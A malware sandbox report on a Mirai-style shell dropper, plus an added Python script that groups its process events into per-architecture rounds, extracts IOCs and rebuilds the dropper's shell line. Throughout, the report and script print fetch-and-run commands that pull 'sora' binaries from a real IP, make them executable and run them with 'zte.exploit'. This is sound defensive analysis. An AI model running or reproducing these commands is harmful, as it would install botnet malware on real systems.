Analysis

  max time kernel:   1s
  max time network:  128s
  platform:          ubuntu-18.04_amd64
  resource:          ubuntu1804-amd64-20240611-en
  resource tags:     arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  submitted:         18/10/2024, 03:05

  Static task
    static1

  Behavioral tasks (all run the same sample, f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh)
    behavioral1   ubuntu1804-amd64-20240611-en
    behavioral2   debian9-armhf-20240418-en
    behavioral3   debian9-mipsbe-20240418-en
    behavioral4   debian9-mipsel-20240611-en
General

  Target:  f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
  Size:    2KB
  MD5:     5ee0ae1a52cdb3d257932d6b048f6846
  SHA1:    074cd5bc461923829a352d3d3b74ca92b72e030a
  SHA256:  f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
  SHA512:  7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a
Malware Config

  (no entries)

Signatures

  File and Directory Permissions Modification   1 TTP, 14 IoCs
    Adversaries may modify file or directory permissions to evade defenses.
    Process: chmod, one invocation per download round
    PIDs:    1507, 1513, 1519, 1525, 1531, 1537, 1543, 1549, 1555, 1561, 1567, 1573, 1579, 1585

  Executes dropped EXE   14 IoCs
    IoC:     /tmp/robben
    Process: robben, one execution per download round
    PIDs:    1508, 1514, 1520, 1526, 1532, 1538, 1544, 1550, 1556, 1562, 1568, 1574, 1580, 1586

  System Network Configuration Discovery   1 TTP, 3 IoCs
    Adversaries may gather information about the network configuration of a system.
    PID   Process
    1510  wget
    1511  curl
    1512  cat

  Writes file to tmp directory   1 IoC
    Malware often drops required files in the /tmp directory.
    Description:  File opened for modification
    IoC:          /tmp/robben
    Process:      f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Processes

The tree below is from behavioral1 (ubuntu1804-amd64-20240611-en). The only depth-1 entry is the submitted script; every other entry is a direct child of it. The children run as 14 rounds of the same five commands, one round per target architecture, differing only in the name of the binary fetched from 93.123.85.141. Two details are worth reading from the argument lists. First, the ten names passed to every chmod are the sandbox's pre-existing /tmp entries in sorted order, which is what a `chmod +x *` run from /tmp expands to; the script does not name its dropped file explicitly. Second, `cat sora.<arch>` shows no output redirect because the shell, not cat, opens the destination file, which is why the "File opened for modification /tmp/robben" event is attributed to the parent script. Each fetched binary is therefore staged under the same name, robben, and run with the argument zte.exploit before the next architecture is tried.

  /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh   (PID 1500)
    command:   /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
    signature: Writes file to tmp directory

    Round 1, sora.x86
      PID 1501  /usr/bin/wget   wget http://93.123.85.141/bins/sora.x86
      PID 1502  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.x86
      PID 1506  /bin/cat        cat sora.x86
      PID 1507  /bin/chmod      chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2
                signature: File and Directory Permissions Modification
      PID 1508  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 2, sora.mips
      PID 1510  /usr/bin/wget   wget http://93.123.85.141/bins/sora.mips
                signature: System Network Configuration Discovery
      PID 1511  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.mips
                signature: System Network Configuration Discovery
      PID 1512  /bin/cat        cat sora.mips
                signature: System Network Configuration Discovery
      PID 1513  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1514  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 3, sora.x86_64
      PID 1516  /usr/bin/wget   wget http://93.123.85.141/bins/sora.x86_64
      PID 1517  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.x86_64
      PID 1518  /bin/cat        cat sora.x86_64
      PID 1519  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1520  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 4, sora.i468
      PID 1522  /usr/bin/wget   wget http://93.123.85.141/bins/sora.i468
      PID 1523  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.i468
      PID 1524  /bin/cat        cat sora.i468
      PID 1525  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1526  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 5, sora.i686
      PID 1528  /usr/bin/wget   wget http://93.123.85.141/bins/sora.i686
      PID 1529  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.i686
      PID 1530  /bin/cat        cat sora.i686
      PID 1531  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1532  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 6, sora.mpsl
      PID 1534  /usr/bin/wget   wget http://93.123.85.141/bins/sora.mpsl
      PID 1535  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.mpsl
      PID 1536  /bin/cat        cat sora.mpsl
      PID 1537  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1538  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 7, sora.arm4
      PID 1540  /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm4
      PID 1541  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm4
      PID 1542  /bin/cat        cat sora.arm4
      PID 1543  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1544  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 8, sora.arm5
      PID 1546  /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm5
      PID 1547  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm5
      PID 1548  /bin/cat        cat sora.arm5
      PID 1549  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1550  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 9, sora.arm6
      PID 1552  /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm6
      PID 1553  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm6
      PID 1554  /bin/cat        cat sora.arm6
      PID 1555  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1556  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 10, sora.arm7
      PID 1558  /usr/bin/wget   wget http://93.123.85.141/bins/sora.arm7
      PID 1559  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.arm7
      PID 1560  /bin/cat        cat sora.arm7
      PID 1561  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1562  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 11, sora.ppc
      PID 1564  /usr/bin/wget   wget http://93.123.85.141/bins/sora.ppc
      PID 1565  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.ppc
      PID 1566  /bin/cat        cat sora.ppc
      PID 1567  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1568  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 12, sora.ppc440fp
      PID 1570  /usr/bin/wget   wget http://93.123.85.141/bins/sora.ppc440fp
      PID 1571  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.ppc440fp
      PID 1572  /bin/cat        cat sora.ppc440fp
      PID 1573  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1574  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 13, sora.m68k
      PID 1576  /usr/bin/wget   wget http://93.123.85.141/bins/sora.m68k
      PID 1577  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.m68k
      PID 1578  /bin/cat        cat sora.m68k
      PID 1579  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1580  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE

    Round 14, sora.sh4
      PID 1582  /usr/bin/wget   wget http://93.123.85.141/bins/sora.sh4
      PID 1583  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.sh4
      PID 1584  /bin/cat        cat sora.sh4
      PID 1585  /bin/chmod      chmod +x (same ten /tmp entries as PID 1507)
                signature: File and Directory Permissions Modification
      PID 1586  /tmp/robben     ./robben zte.exploit
                signature: Executes dropped EXE
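The process list above is the kind of evidence an analyst turns into IOCs and a reconstruction of the dropper. As an added example (not code from the sandbox vendor, the report, or the sample itself), the Python below groups (pid, image, command line) events into per-architecture download rounds, flags rounds that do not reach execution, extracts the hosts, URLs, dropped path, exec argument and target architectures, and rebuilds the shell line each round most likely came from. The embedded events are transcribed from the first three rounds of behavioral1, with the chmod argument list shortened; the trailing wget for sora.arm7 is constructed to show an incomplete round. The `> robben` redirect and `chmod +x *` in the reconstruction are inferences explained in the comments, not anything visible in argv.

```python
"""Group a Mirai-style dropper's process events into per-architecture
download rounds and pull out the network and file IOCs.

Added example, not code from the sandbox vendor or from the sample. It
works on (pid, image, command line) tuples transcribed from the report's
process list, plus one constructed incomplete round at the end."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+")

# Transcribed from the report: the first three download rounds of behavioral1.
# The chmod argument list is shortened to three of its ten /tmp entries.
# The final wget for sora.arm7 is constructed (nothing follows it) to show
# how a round that never reaches execution is reported.
EVENTS = [
    (1500, "/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh",
     "/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh"),
    (1501, "/usr/bin/wget", "wget http://93.123.85.141/bins/sora.x86"),
    (1502, "/usr/bin/curl", "curl -O http://93.123.85.141/bins/sora.x86"),
    (1506, "/bin/cat", "cat sora.x86"),
    (1507, "/bin/chmod", "chmod +x config-err-6aBU03 robben snap-private-tmp"),
    (1508, "/tmp/robben", "./robben zte.exploit"),
    (1510, "/usr/bin/wget", "wget http://93.123.85.141/bins/sora.mips"),
    (1511, "/usr/bin/curl", "curl -O http://93.123.85.141/bins/sora.mips"),
    (1512, "/bin/cat", "cat sora.mips"),
    (1513, "/bin/chmod", "chmod +x config-err-6aBU03 robben snap-private-tmp"),
    (1514, "/tmp/robben", "./robben zte.exploit"),
    (1516, "/usr/bin/wget", "wget http://93.123.85.141/bins/sora.x86_64"),
    (1517, "/usr/bin/curl", "curl -O http://93.123.85.141/bins/sora.x86_64"),
    (1518, "/bin/cat", "cat sora.x86_64"),
    (1519, "/bin/chmod", "chmod +x config-err-6aBU03 robben snap-private-tmp"),
    (1520, "/tmp/robben", "./robben zte.exploit"),
    (1558, "/usr/bin/wget", "wget http://93.123.85.141/bins/sora.arm7"),  # constructed
]


def parse_stages(events):
    """Split the event stream into download rounds.

    A round opens at the first wget/curl of a URL that differs from the
    current round's, collects the cat and chmod that follow, and closes
    at the first execution of a file under /tmp."""
    stages, cur = [], None
    for pid, image, cmdline in events:
        argv = cmdline.split()
        name = image.rsplit("/", 1)[-1]
        if name in ("wget", "curl"):
            m = URL_RE.search(cmdline)
            if not m:
                continue
            url = m.group(0)
            if cur is None or cur["url"] != url:
                cur = {"url": url, "fetchers": [], "staged": None,
                       "chmod": False, "exec": None}
                stages.append(cur)
            cur["fetchers"].append(name)
        elif cur is None:
            continue                      # the root script, before any fetch
        elif name == "cat" and len(argv) > 1:
            cur["staged"] = argv[1]       # file whose bytes become the run name
        elif name == "chmod" and "+x" in argv:
            cur["chmod"] = True
        elif image.startswith("/tmp/"):
            cur["exec"] = {"pid": pid, "path": image, "argv": argv[1:]}
            cur = None                    # the exec closes the round
    return stages


def complete_rounds(stages):
    """Rounds that show the full fetch -> stage -> chmod -> exec chain."""
    return [s for s in stages if s["staged"] and s["chmod"] and s["exec"]]


def extract_iocs(events):
    """Hosts, URLs, dropped paths, exec arguments and target architectures."""
    stages = parse_stages(events)
    execs = [s["exec"] for s in stages if s["exec"]]
    return {
        "hosts": sorted({urlparse(s["url"]).hostname for s in stages}),
        "urls": [s["url"] for s in stages],
        "dropped": sorted({e["path"] for e in execs}),
        "exec_args": sorted({" ".join(e["argv"]) for e in execs}),
        # architecture suffix of the fetched binary, e.g. sora.x86 -> x86
        "archs": [urlparse(s["url"]).path.rsplit(".", 1)[-1] for s in stages],
    }


def reconstruct(stage):
    """Shell line the round most likely came from.

    Two parts are inferred rather than seen: the '> robben' redirect is
    invisible in cat's argv but matches the report's 'File opened for
    modification /tmp/robben' event on the parent shell, and 'chmod +x *'
    is what an argument list equal to /tmp's sorted contents expands from."""
    if not stage["exec"]:
        return f"# incomplete round: {stage['url']}"
    run = stage["exec"]["path"].rsplit("/", 1)[-1]
    args = " ".join(stage["exec"]["argv"])
    return (f"wget {stage['url']}; curl -O {stage['url']}; "
            f"cat {stage['staged']} > {run}; chmod +x *; ./{run} {args}")


if __name__ == "__main__":
    for s in parse_stages(EVENTS):
        print(reconstruct(s))
    print(extract_iocs(EVENTS))
```

Run as-is it prints one reconstructed line per round and the IOC dictionary; the same functions work on the full 14-round list by extending EVENTS with the remaining report entries. The host, dropped path and `zte.exploit` argument are the values worth pivoting on, since they stay constant across every architecture variant.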